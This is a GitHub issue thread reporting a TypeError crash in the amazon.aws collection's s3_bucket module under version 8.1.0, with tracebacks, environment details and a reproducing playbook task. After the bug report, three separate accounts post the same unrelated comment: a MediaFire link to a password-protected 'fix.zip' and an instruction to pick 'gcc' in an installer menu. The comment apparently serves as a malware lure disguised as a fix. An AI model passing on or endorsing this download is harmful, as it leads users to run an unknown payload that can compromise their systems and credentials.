### ISSUE TITLE
amazon.aws.s3_bucket failing with TypeError: cannot unpack non-iterable NoneType object

### ISSUE THREAD

**Issue by chrisahl** [ansible-collections/amazon.aws#2229]
### Summary

When using version 8.0.0 or above (8.1.0 in this example), my amazon.aws.s3_bucket 

```
Traceback (most recent call last):
  File "/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py", line 107, in <module>
    _ansiballz_main()
  File "/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py", line 99, in _ansiballz_main
    invoke_module(zipped_mod, temp_path, ANSIBALLZ_PARAMS)
  File "/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py", line 47, in invoke_module
    runpy.run_module(mod_name='ansible_collections.amazon.aws.plugins.modules.s3_bucket', init_globals=dict(_module_fqn='ansible_collections.amazon.aws.plugins.modules.s3_bucket', _modlib_path=modlib_path),
  File "<frozen runpy>", line 226, in run_module
  File "<frozen runpy>", line 98, in _run_module_code
  File "<frozen runpy>", line 88, in _run_code
  File "/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py", line 2035, in <module>
  File "/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py", line 2029, in main
  File "/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py", line 1044, in create_or_update_bucket
TypeError: cannot unpack non-iterable NoneType object
fatal: [localhost]: FAILED! => {
    "changed": false,
    "module_stderr": "Traceback (most recent call last):\n  File \"/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py\", line 107, in <module>\n    _ansiballz_main()\n  File \"/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py\", line 99, in _ansiballz_main\n    invoke_module(zipped_mod, temp_path, ANSIBALLZ_PARAMS)\n  File \"/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py\", line 47, in invoke_module\n    runpy.run_module(mod_name='ansible_collections.amazon.aws.plugins.modules.s3_bucket', init_globals=dict(_module_fqn='ansible_collections.amazon.aws.plugins.modules.s3_bucket', _modlib_path=modlib_path),\n  File \"<frozen runpy>\", line 226, in run_module\n  File \"<frozen runpy>\", line 98, in _run_module_code\n  File \"<frozen runpy>\", line 88, in _run_code\n  File \"/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py\", line 2035, in <module>\n  File \"/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py\", line 2029, in main\n  File \"/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py\", line 1044, in create_or_update_bucket\nTypeError: cannot unpack non-iterable NoneType object\n",
    "module_stdout": "",
    "msg": "MODULE FAILURE\nSee stdout/stderr for the exact error",
    "rc": 1
}

```

### Issue Type

Bug Report

### Component Name

amazon.aws.s3_bucket

### Ansible Version

```console (paste below)
$ ansible --version

ansible-playbook [core 2.17.2]
  config file = /etc/ansible/ansible.cfg
  configured module search path = ['/github/home/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
  ansible python module location = /usr/local/lib/python3.11/site-packages/ansible
  ansible collection location = /github/home/.ansible/collections:/usr/share/ansible/collections
  executable location = /usr/local/bin/ansible-playbook
  python version = 3.11.7 (main, Jul  4 2024, 00:00:00) [GCC 11.4.1 20231218 (Red Hat 11.4.1-3)] (/usr/bin/python3.11)
  jinja version = 3.1.4
  libyaml = True
```

### Collection Versions

```console (paste below)
$ ansible-galaxy collection list

# /github/home/.ansible/collections/ansible_collections
Collection              Version    
----------------------- -----------
amazon.aws              8.1.0      
community.aws           8.0.0      

# /usr/share/ansible/collections/ansible_collections
Collection              Version    
----------------------- -----------
amazon.aws              7.2.0      
amazon.cloud            0.4.0      
ansible.utils           2.12.0     
awx.awx                 23.9.0     
cloud.terraform         3.0.0      
community.aws           7.2.0      
community.crypto        2.20.0     
community.general       8.6.1      
community.okd           4.0.0      
kubernetes.core         5.0.0      
   
```

### AWS SDK versions

```console (paste below)
$ pip show boto boto3 botocore

Name: boto3
Version: 1.35.5

---
Name: botocore
Version: 1.35.5


```

### Configuration

```console (paste below)
$ ansible-config dump --only-changed

```

### Steps to Reproduce

```yaml (paste below)
# NOET: The AWS S3 bucket was already created
    - name: Update bucket versioning configuration in region {{ aws_region }}
      amazon.aws.s3_bucket:
        name: my-state-{{ target_cloud_account_id }}-{{ aws_region }}
        versioning: true
        region: "{{ aws_region }}"

```

### Expected Results

S3 call works successfully and idempotently (like it did in 7.x.x versions)

### Actual Results

```console (paste below)
Traceback (most recent call last):
  File "/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py", line 107, in <module>
    _ansiballz_main()
  File "/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py", line 99, in _ansiballz_main
    invoke_module(zipped_mod, temp_path, ANSIBALLZ_PARAMS)
  File "/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py", line 47, in invoke_module
    runpy.run_module(mod_name='ansible_collections.amazon.aws.plugins.modules.s3_bucket', init_globals=dict(_module_fqn='ansible_collections.amazon.aws.plugins.modules.s3_bucket', _modlib_path=modlib_path),
  File "<frozen runpy>", line 226, in run_module
  File "<frozen runpy>", line 98, in _run_module_code
  File "<frozen runpy>", line 88, in _run_code
  File "/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py", line 2035, in <module>
  File "/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py", line 2029, in main
  File "/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py", line 1044, in create_or_update_bucket
TypeError: cannot unpack non-iterable NoneType object
fatal: [localhost]: FAILED! => {
    "changed": false,
    "module_stderr": "Traceback (most recent call last):\n  File \"/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py\", line 107, in <module>\n    _ansiballz_main()\n  File \"/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py\", line 99, in _ansiballz_main\n    invoke_module(zipped_mod, temp_path, ANSIBALLZ_PARAMS)\n  File \"/root/.ansible/tmp/ansible-tmp-1724358595.5132093-362-203098167521368/AnsiballZ_s3_bucket.py\", line 47, in invoke_module\n    runpy.run_module(mod_name='ansible_collections.amazon.aws.plugins.modules.s3_bucket', init_globals=dict(_module_fqn='ansible_collections.amazon.aws.plugins.modules.s3_bucket', _modlib_path=modlib_path),\n  File \"<frozen runpy>\", line 226, in run_module\n  File \"<frozen runpy>\", line 98, in _run_module_code\n  File \"<frozen runpy>\", line 88, in _run_code\n  File \"/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py\", line 2035, in <module>\n  File \"/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py\", line 2029, in main\n  File \"/tmp/ansible_amazon.aws.s3_bucket_payload__879gy8z/ansible_amazon.aws.s3_bucket_payload.zip/ansible_collections/amazon/aws/plugins/modules/s3_bucket.py\", line 1044, in create_or_update_bucket\nTypeError: cannot unpack non-iterable NoneType object\n",
    "module_stdout": "",
    "msg": "MODULE FAILURE\nSee stdout/stderr for the exact error",
    "rc": 1
}


```

### Code of Conduct

- [X] I agree to follow the Ansible Code of Conduct

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
